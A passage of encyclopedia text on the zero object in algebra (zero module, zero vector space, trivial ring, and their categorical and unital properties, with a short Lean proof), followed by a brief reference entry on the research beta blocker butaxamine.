As a module (over a ring R), the zero module. The term trivial module is also used, although it may be ambiguous, as a trivial G-module is a G-module with a trivial action.
As a vector space (over a field), the zero vector space, zero-dimensional vector space or just zero space.

These objects are described jointly not only because of the common singleton and trivial group structure, but also because of shared category-theoretical properties. In the last three cases the scalar multiplication by an element k of the base ring (or field) is defined as k · 0 = 0. The most general of them, the zero module, is a finitely generated module with an empty generating set. For structures requiring a multiplication inside the zero object, such as the trivial ring, only one operation is possible, 0 · 0 = 0, because there are no non-zero elements. This structure is associative and commutative. A ring which has both an additive and a multiplicative identity is trivial if and only if 1 = 0, since this equality implies that for every r in the ring, r = r · 1 = r · 0 = 0. In this case it is possible to define division by zero, since the single element is its own multiplicative inverse. Some properties of {0} depend on the exact definition of the multiplicative identity; see the section on unital structures below. Any trivial algebra is also a trivial ring. A trivial algebra over a field is simultaneously the zero vector space considered below; over a commutative ring, a trivial algebra is simultaneously a zero module. The trivial ring is an example of a rng of square zero. A trivial algebra is an example of a zero algebra. The zero-dimensional vector space is an especially ubiquitous example of a zero object: a vector space over a field with an empty basis. It therefore has dimension zero. It is also a trivial group over addition, and a trivial module as mentioned above.

Properties

The zero ring, zero module and zero vector space are the zero objects of, respectively, the category of pseudo-rings, the category of modules, and the category of vector spaces. However, the zero ring is not a zero object in the category of rings, since there is no ring homomorphism from the zero ring into any other ring. The zero object, by definition, must be a terminal object: a morphism A → {0} must exist and be unique for an arbitrary object A. This morphism maps every element of A to 0. The zero object, also by definition, must be an initial object: a morphism {0} → A must exist and be unique for an arbitrary object A. This morphism maps 0, the only element of {0}, to the zero element 0 of A, called the zero vector in vector spaces. This map is a monomorphism, and hence its image is isomorphic to {0}. For modules and vector spaces, this subset {0} is the only empty-generated submodule (or 0-dimensional linear subspace) in each module (or vector space) A.
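The ring-triviality argument above (that 1 = 0 forces every element to vanish) can also be checked mechanically. A sketch in Lean 4, assuming mathlib-style lemma names such as mul_one and mul_zero:

import Mathlib

-- In any ring where the multiplicative identity equals zero,
-- every element is zero: r = r * 1 = r * 0 = 0.
example {R : Type _} [Ring R] (h : (1 : R) = 0) (r : R) : r = 0 := by
  calc r = r * 1 := (mul_one r).symm
       _ = r * 0 := by rw [h]
       _ = 0     := mul_zero r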
Unital structures

The object {0} is a terminal object of any algebraic structure where it exists, as in the examples above. But its existence and, if it exists, its being an initial object (and hence a zero object in the category-theoretical sense) depend on the exact definition of the multiplicative identity 1 in the given structure. If the definition of 1 requires that 1 ≠ 0, then the {0} object cannot exist, because it may contain only one element. In particular, the zero ring is not a field. If mathematicians sometimes talk about a field with one element, this abstract and somewhat mysterious mathematical object is not a field. In categories where the multiplicative identity must be preserved by morphisms but can equal zero, the {0} object can exist, but not as an initial object, because identity-preserving morphisms from {0} to any object where 1 ≠ 0 do not exist. For example, in the category of rings Ring, the ring of integers Z is the initial object, not {0}. If an algebraic structure requires the multiplicative identity but requires neither its preservation by morphisms nor 1 ≠ 0, then zero morphisms exist and the situation is no different from the non-unital structures considered in the previous section.

Notation

Zero vector spaces and zero modules are usually denoted by 0 (instead of {0}). This is always the case when they occur in an exact sequence.

See also

Nildimensional space
Triviality (mathematics)
Examples of vector spaces
Field with one element
Empty semigroup
Zero element
List of zero terms

External links

Ring theory
Linear algebra
Object
Objects (category theory)
Zero object (algebra)
[ "Mathematics" ]
1,063
[ "Mathematical structures", "Objects (category theory)", "Ring theory", "Fields of abstract algebra", "Category theory", "Linear algebra", "Algebra" ]
7,456,469
https://en.wikipedia.org/wiki/Butaxamine
Butaxamine (INN; also known as butoxamine) is a β2-selective beta blocker. Its primary use is in experimental situations in which blockade of β2 receptors is necessary to determine a drug's activity (i.e., if the β2 receptor is completely blocked but a given effect is still present, that effect is not mediated by the β2 receptor). It has no clinical use. An alternative name is α-(1-[tert-butylamino]ethyl)-2,5-dimethoxybenzyl alcohol.

See also

Bupropion
Methoxamine

References

Beta blockers
Beta-Hydroxyamphetamines
Tert-butyl compounds
Butaxamine
[ "Chemistry" ]
153
[ "Pharmacology", "Pharmacology stubs", "Medicinal chemistry stubs" ]